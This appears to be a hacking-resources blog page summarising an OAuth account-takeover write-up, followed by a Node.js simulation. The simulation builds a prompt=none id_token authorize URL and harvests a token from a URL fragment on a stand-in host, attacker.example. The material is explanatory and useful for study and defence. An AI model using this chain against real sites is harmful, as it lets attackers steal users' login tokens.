Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

OAuth Non-Happy Path to ATO- 1730

Omid Rezaei, posted 5 months ago
  • OAuth is a fickle monster. This post looks at a website that, on return from the OAuth flow, automatically redirected to whatever URL was in the Referer header. Most likely this was a multi-site system with one global OAuth page that needed a way back to the originating site. Of note, browsers keep the original Referer across HTTP redirects rather than replacing it with the redirecting URL.
  • An arbitrary redirect inside an OAuth flow is usually an automatic game over, because the auth material itself (the code or token) travels in the URL, either as query parameters or in the fragment. The goal of the attack was therefore to trigger a redirect that carries the user's token to an attacker-controlled page.
  • While trying to abuse this, they learned that a client-side (JavaScript) redirect drops the URL fragment, whereas a server-side (HTTP 3xx) redirect does not: the server never sees the fragment, and the browser re-attaches it to the Location target. The application's standard OAuth flow used a client-side redirect, but switching response_type to id_token triggered a server-side redirect instead, so the auth material in the fragment survived the hop.
  • They then reviewed the OAuth providers the application supported: Facebook, GitHub and Google. Facebook had a confirmation step that changed the Referer, and GitHub does not take a response_type parameter at all. Google showed an account-selection screen for users signed into more than one account, but adding prompt=none to the authorization request bypassed that prompt.
  • The final attack tricked the victim into visiting the attacker's site, which called window.open() to start the OAuth flow. Because the attacker's page was the referrer of that navigation, the flow eventually redirected back to the attacker's site, where the token could be read out of the URL.
  • This write-up is a good example of spotting bad functionality and then finding the primitives needed to trigger it properly. It contains numerous small tricks and took considerable perseverance. Great write-up!
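The two browser rules the chain above depends on (a 3xx redirect carries the original fragment along, a script-driven redirect does not) and the final harvesting step are easy to get wrong when reproducing this class of bug, so here is an added example that models them in plain Node.js. It is not code from Omid Rezaei's write-up or from this page; the hostnames, client_id, nonce and the sample token are constructed, and the authorization endpoint is only an illustrative URL.

```javascript
// Added example (not from the original write-up or this page). Models the
// browser behaviour behind the OAuth-redirect-to-Referer chain and the fragment
// harvesting the attacker's landing page performs. All hosts are hypothetical.

// Browser behaviour on an HTTP 3xx redirect (WHATWG Fetch, "HTTP-redirect
// fetch"): if the Location header carries no fragment, the fragment of the
// request URL is re-attached to the target. The server never sees the fragment,
// so a server-side redirect to the Referer cannot strip it.
function followServerRedirect(currentUrl, locationHeader) {
  const current = new URL(currentUrl);
  const target = new URL(locationHeader, current);
  if (target.hash === "" && current.hash !== "") {
    target.hash = current.hash;
  }
  return target.href;
}

// A client-side redirect (e.g. `location = next` in page script) navigates to
// exactly the string the script builds; the fragment is lost unless the script
// copies it over itself.
function followClientRedirect(currentUrl, next) {
  return new URL(next, currentUrl).href;
}

// Authorization URL the attacker's page would pass to window.open().
// response_type=id_token puts the token in the fragment (implicit/OIDC style)
// and prompt=none suppresses the provider's account chooser. The endpoint,
// client_id, redirect_uri and nonce values are assumptions for the demo.
function buildAuthorizeUrl(authEndpoint, clientId, redirectUri, nonce) {
  const u = new URL(authEndpoint);
  u.searchParams.set("client_id", clientId);
  u.searchParams.set("redirect_uri", redirectUri);
  u.searchParams.set("response_type", "id_token");
  u.searchParams.set("scope", "openid email");
  u.searchParams.set("nonce", nonce);
  u.searchParams.set("prompt", "none");
  return u.href;
}

// What the attacker's landing page does once the victim lands on it: read
// window.location.hash and pull the token out. Takes the hash string as an
// argument so it also runs outside a browser.
function harvestFragmentToken(hash) {
  const params = new URLSearchParams(hash.replace(/^#/, ""));
  return params.get("id_token") || params.get("access_token") || null;
}

// End-to-end simulation with constructed URLs: the app's callback URL already
// carries the token in its fragment, and the app redirects to the Referer,
// which is the attacker's page because it opened the flow with window.open().
function simulateChain(redirectType) {
  const callback =
    "https://victim-app.example/oauth/callback#id_token=eyJ.sample.token&state=xyz";
  const referer = "https://attacker.example/landing";
  const landing =
    redirectType === "server"
      ? followServerRedirect(callback, referer)
      : followClientRedirect(callback, referer);
  return { landing, token: harvestFragmentToken(new URL(landing).hash) };
}

if (typeof require !== "undefined" && require.main === module) {
  console.log("server-side redirect:", simulateChain("server"));
  console.log("client-side redirect:", simulateChain("client"));
}
```

Running it shows the asymmetry the write-up hinged on: with the server-side redirect the landing URL still ends in `#id_token=...` and the token is recovered, while the client-side redirect arrives with an empty fragment and nothing to harvest. The same `followServerRedirect` rule is why an open redirect reachable from an OAuth callback that returns tokens in the fragment is so dangerous.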